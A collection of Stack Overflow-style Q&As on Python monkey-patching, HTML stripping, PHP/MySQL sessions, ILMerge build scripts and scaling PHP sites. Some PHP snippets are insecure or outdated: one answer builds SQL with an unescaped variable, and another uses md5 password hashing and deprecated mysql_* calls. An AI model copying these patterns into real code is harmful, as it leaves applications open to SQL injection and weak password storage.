Both of John's solutions would work. Another option that allows HTMLDecorator to remain very simple and clean is to monkey-patch it in as a base class. This also works only for user-defined classes, not builtin types: ``` import cgi class ClassX(object): pass # ... with own __repr__ class ClassY(object): pass # ... with own __repr__ inst_x=ClassX() inst_y=ClassY() class HTMLDecorator: def html(self): # an "enhanced" version of __repr__ return cgi.escape(self.__repr__()).join(("<H1>","</H1>")) ClassX.__bases__ += (HTMLDecorator,) ClassY.__bases__ += (HTMLDecorator,) print inst_x.html() print inst_y.html() ``` Be warned, though -- monkey-patching like this comes with a high price in readability and maintainability of your code. When you go back to this code a year later, it can become very difficult to figure out how your ClassX got that html() method, especially if ClassX is defined in some other library.
How can I simply inherit methods from an existing instance?
[ "", "python", "oop", "inheritance", "object", "" ]
Because regular expressions scare me, I'm trying to find a way to remove all HTML tags and resolve HTML entities from a string in Python.
Use [lxml](http://lxml.de/) which is the best xml/html library for python. ``` import lxml.html t = lxml.html.fromstring("...") t.text_content() ``` And if you just want to sanitize the html look at the lxml.html.clean [module](http://lxml.de/lxmlhtml.html#cleaning-up-html)
Use [BeautifulSoup](http://www.crummy.com/software/BeautifulSoup/)! It's perfect for this, where you have incoming markup of dubious virtue and need to get something reasonable out of it. Just pass in the original text, extract all the string tags, and join them.
Filter out HTML tags and resolve entities in python
[ "", "python", "html", "" ]
What is the quickest way to get a large amount of data (think golf) and the most efficient (think performance) to get a large amount of data from a MySQL database to a session without having to continue doing what I already have: ``` $sql = "SELECT * FROM users WHERE username='" . mysql_escape_string($_POST['username']) . "' AND password='" . mysql_escape_string(md5($_POST['password'])) . "'"; $result = mysql_query($sql, $link) or die("There was an error while trying to get your information.\n<!--\n" . mysql_error($link) . "\n-->"); if(mysql_num_rows($result) < 1) { $_SESSION['username'] = $_POST['username']; redirect('index.php?p=signup'); } $_SESSION['id'] = mysql_result($result, '0', 'id'); $_SESSION['fName'] = mysql_result($result, '0', 'fName'); $_SESSION['lName'] = mysql_result($result, '0', 'lName'); ... ``` And before anyone asks yes I do really need to 'SELECT Edit: Yes, I am sanitizing the data, so that there can be no SQL injection, that is further up in the code.
I came up with this and it appears to work. ``` while($row = mysql_fetch_assoc($result)) { $_SESSION = array_merge_recursive($_SESSION, $row); } ```
Most efficient: ``` $get = mysql_query("SELECT * FROM table_name WHERE field_name=$something") or die(mysql_error()); $_SESSION['data'] = mysql_fetch_assoc($get); ``` Done. This is now stored in an array. So say a field is username you just do: ``` echo $_SESSION['data']['username']; ``` Data is the name of the array - username is the array field.. which holds the value for that field. EDIT: fixed some syntax mistakes :P but you get the idea.
Most efficient way to get data from the database to session
[ "", "php", "mysql", "session", "" ]
Do you use ILMerge? Do you use ILMerge to merge multiple assemblies to ease deployment of dll's? Have you found problems with deployment/versioning in production after ILMerging assemblies together? I'm looking for some advice in regards to using ILMerge to reduce deployment friction, if that is even possible.
I use ILMerge for almost all of my different applications. I have it integrated right into the release build process so what I end up with is one exe per application with no extra dll's. You can't ILMerge any C++ assemblies that have native code. You also can't ILMerge any assemblies that contain XAML for WPF (at least I haven't had any success with that). It complains at runtime that the resources cannot be located. I did write a wrapper executable for ILMerge where I pass in the startup exe name for the project I want to merge, and an output exe name, and then it reflects the dependent assemblies and calls ILMerge with the appropriate command line parameters. It is much easier now when I add new assemblies to the project, I don't have to remember to update the build script.
## Introduction This post shows how to replace all `.exe + .dll files` with a single `combined .exe`. It also keeps the debugging `.pdb` file intact. ## For Console Apps Here is the basic `Post Build String` for Visual Studio 2010 SP1, using .NET 4.0. I am building a console .exe with all of the sub-.dll files included in it. ``` "$(SolutionDir)ILMerge\ILMerge.exe" /out:"$(TargetDir)$(TargetName).all.exe" "$(TargetDir)$(TargetName).exe" "$(TargetDir)*.dll" /target:exe /targetplatform:v4,C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /wildcards ``` ## Basic hints * The output is a file "`AssemblyName.all.exe`" which combines all sub-dlls into one .exe. * Notice the `ILMerge\` directory. You need to either copy the ILMerge utility into your solution directory (so you can distribute the source without having to worry about documenting the install of ILMerge), or change the this path to point to where ILMerge.exe resides. ## Advanced hints If you have problems with it not working, turn on `Output`, and select `Show output from: Build`. Check the exact command that Visual Studio actually generated, and check for errors. # Sample Build Script This script replaces all `.exe + .dll files` with a single `combined .exe`. It also keeps the debugging .pdb file intact. To use, paste this into your `Post Build` step, under the `Build Events` tab in a C# project, and make sure you adjust the path in the first line to point to `ILMerge.exe`: ``` rem Create a single .exe that combines the root .exe and all subassemblies. "$(SolutionDir)ILMerge\ILMerge.exe" /out:"$(TargetDir)$(TargetName).all.exe" "$(TargetDir)$(TargetName).exe" "$(TargetDir)*.dll" /target:exe /targetplatform:v4,C:\Windows\Microsoft.NET\Framework64\v4.0.30319 /wildcards rem Remove all subassemblies. del *.dll rem Remove all .pdb files (except the new, combined pdb we just created). ren "$(TargetDir)$(TargetName).all.pdb" "$(TargetName).all.pdb.temp" del *.pdb ren "$(TargetDir)$(TargetName).all.pdb.temp" "$(TargetName).all.pdb" rem Delete the original, non-combined .exe. del "$(TargetDir)$(TargetName).exe" rem Rename the combined .exe and .pdb to the original project name we started with. ren "$(TargetDir)$(TargetName).all.pdb" "$(TargetName).pdb" ren "$(TargetDir)$(TargetName).all.exe" "$(TargetName).exe" exit 0 ```
ILMerge Best Practices
[ "", "c#", ".net", "deployment", "ilmerge", "" ]
Before you answer this I have never developed anything popular enough to attain high server loads. Treat me as (sigh) an alien that has just landed on the planet, albeit one that knows PHP and a few optimisation techniques. --- I'm developing a tool in **PHP** that could attain quite a lot of users, if it works out right. However while I'm fully capable of developing the program I'm pretty much clueless when it comes to making something that can deal with huge traffic. So here's a few questions on it (feel free to turn this question into a resource thread as well). ## Databases At the moment I plan to use the MySQLi features in PHP5. However how should I setup the databases in relation to users and content? Do I actually *need* multiple databases? At the moment everything's jumbled into one database - although I've been considering spreading user data to one, actual content to another and finally core site content (template masters etc.) to another. My reasoning behind this is that sending queries to different databases will ease up the load on them as one database = 3 load sources. Also would this still be effective if they were all on the same server? ## Caching I have a template system that is used to build the pages and swap out variables. Master templates are stored in the database and each time a template is called its cached copy (a html document) is called. At the moment I have two types of variable in these templates - a static var and a dynamic var. Static vars are usually things like page names, the name of the site - things that don't change often; dynamic vars are things that change on each page load. My question on this: Say I have comments on different articles. Which is a better solution: store the simple comment template and render comments (from a DB call) each time the page is loaded or store a cached copy of the comments page as a html page - each time a comment is added/edited/deleted the page is recached. ## Finally Does anyone have any tips/pointers for running a high load site on PHP. I'm pretty sure it's a workable language to use - Facebook and Yahoo! give it great precedence - but are there any experiences I should watch out for?
No two sites are alike. You really need to get a tool like [jmeter](http://jakarta.apache.org/jmeter/) and benchmark to see where your problem points will be. You can spend a lot of time guessing and improving, but you won't see real results until you measure and compare your changes. For example, for many years, the MySQL query cache was the solution to all of our performance problems. If your site was slow, MySQL experts suggested turning the query cache on. It turns out that if you have a high write load, the cache is actually crippling. If you turned it on without testing, you'd never know. And don't forget that you are never done scaling. A site that handles 10req/s will need changes to support 1000req/s. And if you're lucking enough to need to support 10,000req/s, your architecture will probably look completely different as well. # Databases * Don't use MySQLi -- [PDO](http://ca.php.net/pdo) is the 'modern' OO database access layer. The most important feature to use is placeholders in your queries. It's smart enough to use server side prepares and other optimizations for you as well. * You probably don't want to break your database up at this point. If you do find that one database isn't cutting, there are several techniques to scale up, depending on your app. Replicating to additional servers typically works well if you have more reads than writes. Sharding is a technique to split your data over many machines. # Caching * You probably don't want to cache in your database. The database is typically your bottleneck, so adding more IO's to it is typically a bad thing. There are several PHP caches out there that accomplish similar things like [APC](http://ca.php.net/apc) and Zend. * Measure your system with caching on and off. I bet your cache is heavier than serving the pages straight. * If it takes a long time to build your comments and article data from the db, integrate [memcache](http://www.danga.com/memcached/) into your system. You can cache the query results and store them in a memcached instance. It's important to remember that retrieving the data from memcache must be faster than assembling it from the database to see any benefit. * If your articles aren't dynamic, or you have simple dynamic changes after it's generated, consider writing out html or php to the disk. You could have an index.php page that looks on disk for the article, if it's there, it streams it to the client. If it isn't, it generates the article, writes it to the disk and sends it to the client. Deleting files from the disk would cause pages to be re-written. If a comment is added to an article, delete the cached copy -- it would be regenerated.
I'm a lead developer on a site with over 15M users. We have had very little scaling problems because we planned for it EARLY and scaled thoughtfully. Here are some of the strategies I can suggest from my experience. **SCHEMA** First off, denormalize your schemas. This means that rather than to have multiple relational tables, you should instead opt to have one big table. In general, joins are a waste of precious DB resources because doing multiple prepares and collation burns disk I/O's. Avoid them when you can. The trade-off here is that you will be storing/pulling redundant data, but this is acceptable because data and intra-cage bandwidth is very cheap (bigger disks) whereas multiple prepare I/O's are orders of magnitude more expensive (more servers). **INDEXING** Make sure that your queries utilize at least one index. Beware though, that indexes will cost you if you write or update frequently. There are some experimental tricks to avoid this. You can try adding additional columns that aren't indexed which run parallel to your columns that are indexed. Then you can have an offline process that writes the non-indexed columns over the indexed columns in batches. This way, you can control better when mySQL will need to recompute the index. Avoid computed queries like a plague. If you must compute a query, try to do this once at write time. **CACHING** I highly recommend Memcached. It has been proven by the biggest players on the PHP stack (Facebook) and is very flexible. There are two methods to doing this, one is caching in your DB layer, the other is caching in your business logic layer. The DB layer option would require caching the result of queries retrieved from the DB. You can hash your SQL query using md5() and use that as a lookup key before going to database. The upside to this is that it is pretty easy to implement. The downside (depending on implementation) is that you lose flexibility because you're treating all caching the same with regard to cache expiration. In the shop I work in, we use business layer caching, which means each concrete class in our system controls its own caching schema and cache timeouts. This has worked pretty well for us, but be aware that items retrieved from DB may not be the same as items from cache, so you will have to update cache and DB together. **DATA SHARDING** Replication only gets you so far. Sooner than you expect, your writes will become a bottleneck. To compensate, make sure to support data sharding early as possible. You will likely want to shoot yourself later if you don't. It is pretty simple to implement. Basically, you want to separate the key authority from the data storage. Use a global DB to store a mapping between primary keys and cluster ids. You query this mapping to get a cluster, and then query the cluster to get the data. You can cache the hell out of this lookup operation which will make it a negligible operation. The downside to this is that it may be difficult to piece together data from multiple shards. But, you can engineer your way around that as well. **OFFLINE PROCESSING** Don't make the user wait for your backend if they don't have to. Build a job queue and move any processing that you can offline, doing it separate from the user's request.
Tactics for using PHP in a high-load site
[ "", "php", "performance", "high-load", "" ]